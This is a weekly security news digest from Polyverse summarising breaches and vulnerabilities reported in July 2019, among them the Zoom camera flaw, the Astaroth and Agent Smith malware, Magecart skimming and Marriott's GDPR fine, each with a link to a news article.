Polyverse Weekly Breach Report

breach_report

A snapshot of last week’s reported cybersecurity breaches and vulnerabilities

Zoom

A security researcher publicly disclosed a zero-day flaw that enables websites to hijack cameras on Apple Macs that have the Zoom video-conferencing app installed. The researcher initially disclosed the vulnerability to Zoom, giving them 90 days to solve the problem; it didn’t, so he went public. The company now says it has fixed the vulnerability; the researcher disagrees. To read more: https://www.theverge.com/2019/7/8/20687014/zoom-security-flaw-video-conference-websites-hijack-mac-cameras

Apple also released an update for Mac users to remove the vulnerability in Zoom. Apple’s update will apparently protect past and present users from the app itself. To read more: https://techcrunch.com/2019/07/10/apple-silent-update-zoom-app/

Android apps

Researchers at the International Computer Science Institute in California found that some app developers are using questionable techniques for harvesting user data. They discovered that more than 1,300 Android apps use workarounds to collect precise location data even when users have explicitly denied the required permissions. To read more: https://thehackernews.com/2019/07/android-permission-bypass.html

Astaroth malware

Microsoft’s security team is warning users of an ongoing malware campaign to distribute the Astaroth trojan. The campaign consists of a massive spam operation that sends out email with a link to a website hosting an LNK file. If run, the file launches the Windows Management Instrumentation Command-line tool, which starts a chain of events that eventually loads the Astaroth malware. To read more: https://www.zdnet.com/article/microsoft-warns-about-astaroth-malware-campaign/

Croatia

A hacker group believed to be state-sponsored (and probably Russian) targeted Croatian government employees earlier this year. Victims received spear-phishing emails that contained a link to apparently official websites; these faked sites had the ability to infect users’ machines with malware. To read more: https://www.zdnet.com/article/croatian-government-targeted-by-mysterious-hackers/

Torrent sites

An ongoing campaign primarily affecting South Korea is spreading malware via torrent sites. The malware, disguised as Korean movies and TV shows, is a modified version of the GoBot2 backdoor, which enables attackers to connect a compromised computer to a botnet. To read more: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/

WannaCry

TechCrunch has published an in-depth story on the “kill switch” that prevented a second WannaCry outbreak, and the two security researchers who stopped the malware from spreading. To read more: https://techcrunch.com/2019/07/08/the-wannacry-sinkhole/

NAS devices

New ransomware is targeting Network Attached Storage (NAS) devices made by QNAP Systems, a Taiwanese company. NAS devices provide dedicated file storage that allows users to store and share data and backups on multiple computers. The ransomware targets QNAP NAS devices through brute-forcing weak credentials and exploiting known vulnerabilities. To read more: https://thehackernews.com/2019/07/ransomware-nas-devices.html

FinSpy

Researchers detected a commercial surveillance spyware known as FinSpy targeting users in Myanmar. The spyware was created by Gamma International, a German company, and targets various mobile platforms and desktop operating systems. To read more: https://thehackernews.com/2019/07/finspy-spyware-android-ios.html

Marriott

This American hotel company was fined $123m for a 2014 data breach under Europe’s General Data Protection Regulation (GDPR). Hackers compromised Marriott’s guest-reservation database and collected the personal details of 339m guests. The penalty notice came within a week of British Airways being fined a record £183m ($227m) for a GDPR breach. To read more: https://thehackernews.com/2019/07/marriott-data-breach-gdpr.html

 

Check out Have I Been Pwned to see if any of your accounts have been exposed by the above breaches.

 

Dell System Detect

A flaw in Dell System Detect enables an attacker to trigger the program to download and execute arbitrary files without user interaction. To read more: https://tomforb.es/dell-system-detect-rce-vulnerability/

Magecart

Researchers found a new supply-chain attack carried out against 17,000 domains by so-called Magecart hackers, who inject digital card skimmers into websites. The new attack scans the internet for misconfigured Amazon S3 buckets and then injects the skimming code via JavaScript files. To read more: https://thehackernews.com/2019/07/magecart-amazon-s3-hacking.html

Buhtrap

A hacking group known as Buhtrap was found using a Windows zero-day vulnerability that Microsoft fixed in June of this year. The flaw, a privilege escalation issue, only affects older versions of Windows. To read more: https://www.securityweek.com/buhtrap-group-used-windows-zero-day-government-attack

Agent Smith malware

New mobile malware infected 25m Android mobile devices globally, including 15m in India. The malware uses multiple vulnerabilities to inject malicious code into the APK files of targeted apps. To read more: https://thehackernews.com/2019/07/whatsapp-android-malware.html

K12.com

The records of 7m students were exposed when a K12.com MongoDB database was left open on the internet. The exposed database contained information such as email addresses, names and genders. To read more: https://www.comparitech.com/blog/vpn-privacy/report-7-million-student-records-exposed-by-k12-com/

Pale Moon web browser

The team behind the Pale Moon web browser announced that its Windows archive servers were breached, and that hackers had installed malware on all archived installers of Pale Moon 27.6.2. To read more: https://www.bleepingcomputer.com/news/security/hackers-infect-pale-moon-archive-server-with-a-malware-dropper/

Canonical

The GitHub account of Canonical, the company behind Ubuntu, was hacked last weekend, but the Ubuntu Linux source code was not accessed. The hacker created 11 new GitHub repositories in the official Canonical account. To read more: https://www.zdnet.com/article/canonical-github-account-hacked-ubuntu-source-code-safe/

7-Eleven Japan

7-Eleven Japan shut down its mobile payment app after it was hit by a cyberattack that resulted in $506,000 in fraudulent transactions. The hacker accessed user accounts and made fraudulent purchases on cards that were stored on the app. To read more: https://www.mobilepaymentstoday.com/news/7-eleven-japan-suspends-mobile-app-after-data-breach/

Nemadji Research

A contractor with the Los Angeles County Department of Health Services is notifying patients about a phishing attack that exposed the personal information of 14,591 patients. The contractor, Nemadji Research, identifies and verifies patient eligibility for programs that reimburse for care provided by the department. To read more: https://www.smdp.com/citywide-notifications-underway-after-contractor-data-breach-exposes-dhs-patient-data/177282

American Hockey League app

The American Hockey League’s app malfunctioned this week, and started sending push notifications about a workplace dispute between two people. The league says that the problem is now fixed. To read more: https://www.vice.com/en_us/article/bj9ejz/a-sports-app-spammed-push-notifications-about-a-bizarre-violent-workplace-beef

Bitpoint

This Japan-based cryptocurrency exchange announced that it had lost $32m worth of cryptocurrency after a cyberattack. The attackers stole Bitcoin, Bitcoin Cash, Litecoin, Ripple and Ethereal. To read more: https://www.zdnet.com/article/bitpoint-cryptocurrency-exchange-hacked-for-32-million/

Zip bomb

A researcher created a new type of zip bomb when he figured out how to achieve compression rates so high that he managed to get a 46-megabyte file to compress 4.5 petabytes of data. When decompressed, zip bombs can crash a system because they overwhelm a machine’s CPU, RAM and disk space. To read more: https://www.vice.com/en_us/article/597vzx/the-most-clever-zip-bomb-ever-made-explodes-a-46mb-file-to-45-petabytes

Train Manufacturer

A software engineer stole source code from a train manufacturer based in Chicago. He downloaded more than 3,000 electronic files that contained trade secrets and intellectual property, then fled to China. To read more: https://www.zdnet.com/article/engineer-flees-to-china-after-stealing-source-code-of-us-train-firm/

Vitagene

DNA-testing vendor Vitagene accidentally exposed 3,000 consumers’ personal information through a misconfigured database. To read more: https://healthitsecurity.com/news/dna-testing-service-vendor-reports-years-long-consumer-data-breach

Want to learn more?

Sign up below and receive these reports and more, directly in your inbox.

https://upscri.be/9816bc

The registered trademark Linux® is used pursuant to a sublicense from the Linux Foundation, the exclusive licensee of Linus Torvalds, owner of the mark on a world­wide basis.